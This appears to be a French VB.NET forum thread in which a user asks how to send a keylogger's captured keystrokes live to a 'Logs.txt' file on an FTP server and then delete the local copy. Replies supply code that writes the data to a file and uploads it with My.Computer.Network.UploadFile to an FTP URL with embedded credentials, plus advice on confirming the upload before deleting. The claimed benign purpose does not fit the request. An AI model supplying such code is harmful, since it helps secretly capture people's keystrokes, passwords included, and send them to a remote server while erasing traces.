Enregistrer Keylogg sur FTP ? [Résolu]

Signaler
-
 Utilisateur anonyme -
Bien le bonjour !

J'ai un petit Keylogger, (pas pour hacker, pour regarder les données cryptées que j'entre) et j'aimerais qu'elles soient sauvegardées sur mon serveur FTP.
Je m'explique: j'ai une TextBox et un Bouton pour démarrer l'enregistrement des données, et je veux qu'elles soient envoyées en direct sur un fichier "Logs.txt" de mon serveur.
Possible ?
J'ai testé :
Dim key As New System.IO.StreamWriter("mon FTP")
mais quand le le débogue, mon VB 2010 m'affiche ça: Le format du chemin d'accès donné n'est pas pris en charge.

Merci pour l'aide

Code for Fun.
Www.youtube.com/thecrafter78

3 réponses

My.Computer.Network.UploadFile ne retourne rien. Il est donc impossible de savoir si l'opération fut concluante ou pas.
Utilise plutôt System.Net.FtpWebRequest et System.Net.FtpWebResponse (voir msdn) pour t'en assurer. Tu pourras ensuite supprimer ton fichier en toute quiétude.

Bonjour,

Tu dois d'abord écrire ton fichier puis l'envoyer sur ton serveur ftp :
Using sw As New IO.StreamWriter(Application.StartupPath & "\monfichier.txt")
    sw.WriteLine(mesdonnees)
End Using

My.Computer.Network.UploadFile(io.path.combine(Application.StartupPath, "monfichier.txt"), "ftp://user:password@serveurftp.com/dossier/monfichier.txt")

Merci !
Mais encore une chose: j'aimerais que le fichier ne reste pas sur mon ordinateur, mon disque dur est presque saturé. Y'a un moyen de le supprimer du DD dès qu'il est sur le FTP ?

Code for Fun.
Www.youtube.com/thecrafter78